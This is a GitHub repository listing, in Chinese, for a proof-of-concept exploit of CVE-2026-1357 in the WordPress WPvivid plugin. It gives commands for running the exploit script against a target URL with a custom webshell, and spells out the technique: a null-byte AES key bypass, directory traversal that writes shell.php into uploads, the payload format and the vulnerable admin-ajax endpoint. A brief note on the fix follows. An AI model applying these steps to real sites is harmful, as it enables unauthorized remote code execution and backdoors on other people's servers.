itsismarcos/Exploit-CVE-2026-1357
GitHub: itsismarcos/Exploit-CVE-2026-1357
针对 WordPress WPvivid 插件 CVE-2026-1357 的 PoC 工具,利用 null byte 密钥绕过和目录穿越实现 RCE。
Stars: 1 | Forks: 0
# 安装依赖
pip3 install pycryptodome requests
# 基础漏洞利用
python3 wpvivi.py http://target.com
# 自定义 Webshell
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code ""
技术说明:
Null Byte Key:当 RSA decrypt 失败时,返回 false,phpseclib 将其处理为 "\x00\x00\x00"。我们使用 16 个 null byte 作为 AES-128 ECB 密钥。
Directory Traversal:Filename 未经过滤,允许 ../../../../wp-content/uploads/shell.php
Payload 格式:
[len_key_hex(2 字节)] + [key_hex] + [len_data_hex(16 字节)] + [encrypted_data]
执行:
POST 到 /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site
wpvivid_content = base64(加密后的 payload)
检测与缓解:
已在 0.9.124 版本修复:
- 检查 `if ($key === false || empty($key)) return false;`
- 扩展名白名单:zip,gz,tar,sql
标签:0day, AES-128-ECB, CISA项目, CVE-2026-1357, OpenVAS, PE 加载器, PHP, pycryptodome, Python Exploit, RCE, RSA解密缺陷, Webshell, WordPress漏洞, WPvivid插件, 后门, 密码学攻击, 文件上传漏洞, 空字节注入, 编程工具, 网络信息收集, 网络安全, 远程代码执行, 隐私保护, 高危漏洞